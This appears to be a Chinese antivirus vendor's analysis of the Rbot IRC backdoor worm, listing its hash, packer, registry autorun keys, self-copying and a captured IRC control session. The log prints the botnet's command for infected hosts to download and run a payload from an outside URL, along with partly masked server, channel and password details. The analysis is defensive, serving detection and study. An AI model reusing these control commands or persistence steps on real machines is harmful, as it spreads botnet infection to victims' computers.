病毒名称： Backdoor.Win32.Rbot.fob
病毒类型： 后门
文件 MD5： 45D0455398BD893176EB34C4B319D618
公开范围： 完全公开
危害等级： 4
文件长度： 506,880 字节
感染系统： Windows98以上版本
加壳类型： Themida|WinLicense V1.9.2.0 -> Oreans Technologies [Overlay] *

　　该病毒运行后，复制自身到%System32%目录下，添加注册表自动运行项以随机引导
病毒体；连接网络下载病毒文件，病毒运行后自我删除，此病毒为一个利用Windows平台
下IRC协议的网络蠕虫，受感染用户可能会被操纵进行Ddos攻击、远程控制、发送垃圾邮
件、创建本地Tftp、下载病毒文件等行为。

本地行为：

1、复制自身到 %system32% 文件夹下gwbuahihk.exe。

2、新增注册表：

　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　\Windows\CurrentVersion\Run]
　　　　注册表值： "Winds Sersc Agts"
　　　　类型： REG_SZ
　　　　值： "zxnyjgzyu.exe"

　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　\Windows\CurrentVersion\RunServices]
　　　　注册表值： "Winds Sersc Agts"
　　　　类型： REG_SZ
　　　　值： "zxnyjgzyu.exe

网络行为:

1、连接IRC服务器等待控制：

　　　　协议：TCP
　　　　连接服务器名：irc.priv****t.com
　　　　域名或IP地址：
　　　　209.250.232.2***：7000
　　　　加入的 IRC 频道名：
　　　　#FAAK#
　　　　用户名：dcxvtfdxls （随机小写字母）
　　　　密码：9400002290
　　　　对目标主机的操作：
　　　　/*昵称*/
　　　　NICK CHN|9400002290
　　　　/*欢迎信息*/
　　　　:irc.priv****.com NOTICE AUTH
　　　　:*** Looking up your hostname...
　　　　:irc.priv****.com NOTICE AUTH
　　　　:*** Couldn't resolve your hostname
　　　　:using your IP address instead
　　　　:irc.priv****.com 001 CHN|9400002290
　　　　:irc.priv****.com 002 CHN|9400002290
　　　　: M0dded by uNkn0wn Crew
　　　　:irc.priv****.com 003 CHN|9400002290
　　　　:irc.priv****.com 004 CHN|9400002290
　　　　:www.uNkn0wn.eu - iD@uNkn0wn.eu
　　　　:irc.priv****.com 005 CHN|9400002290
　　　　:irc.priv****.com 005 CHN|9400002290
　　　　:irc.priv****.com 005 CHN|9400002290
　　　　/*设置用户属性与加入房间及返回相关信息*/
　　　　:irc.priv****.com 422 CHN|9400002290
　　　　:MOTD File is missing
　　　　:CHN|9400002290 MODE CHN|9400002290 :+iwG
　　　　:irc.priv****.com 302
　　　　MODE CHN|9400002290 -x+i
　　　　JOIN #FAAK# saad.
　　　　USERHOST CHN|9400002290
　　　　MODE CHN|9400002290 -x+i
　　　　JOIN #FAAK# saad.
　　　　USERHOST CHN|9400002290
　　　　MODE CHN|9400002290 -x+i
　　　　JOIN #FAAK# saad.
　　　　USERHOST CHN|9400002290
　　　　MODE CHN|9400002290 -x+i
　　　　JOIN #FAAK# saad.
　　　　:CHN|9400002290!dcxvtfdxls@219.147.182.*** JOIN :#FAAK#
　　　　:irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
　　　　:irc.priv****t.com 302 CHN|9400002290 　　　　:CHN|9400002290=+dcxvtfdxls@219.147.182.***
　　　　:irc.priv****.com 302 CHN|9400002290 　　　　:CHN|9400002290=+dcxvtfdxls@219.147.182.***
　　　　:irc.priv****.com 302 CHN|9400002290 　　　　:CHN|9400002290=+dcxvtfdxls@219.147.182.***
　　　　/*加入房间#kok6*/
　　　　JOIN #FAAK# saad.
　　　　/*用户信息显示*/
　　　　USERHOST CHN|9400002290
　　　　:irc.priv****.com 302 CHN|9400002290 　　　　:CHN|9400002290=+dcxvtfdxls@219.147.182.***
　　　　/*连接网络下载病毒*/
　　　　:irc.priv****.com 332 CHN|9400002290 #FAAK# :.jp]de100 　　　　http://members.ly***.co.uk/abosal7/usb.exe sty.exe
　　　　:irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
　　　　/*服务器发送连接响应*/
　　　　PING :irc.priv****.com
　　　　/*回应服务器*/
　　　　PONG :irc.priv****.com
　　　　/*加入房间*/
　　　　JOIN #FAAK# saad.
　　　　
2、连接网络下载病毒文件：
　　　　协议：TCP
　　　　域名或IP地址：http://members.l****.co.uk (213.193.4.**)
　　　　端口：80
　　　　对目标主机的操作：下载病毒文件
　　　　http://members.ly****.co.uk/abosal7/usb.exe

注： %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的
位置。
　　
　　　　%Windir% 　　　　　 　　　　　 WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　 逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　 系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　\当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是C:\Windows\System
　　　　windowsXP中默认的安装路径是C:\Windows\System32　　

注2：与IRC服务器的交互信息中，符号“/**/”内的数据是分析员对下一行或几行的注释信息，非为与服务器的交互信息内容。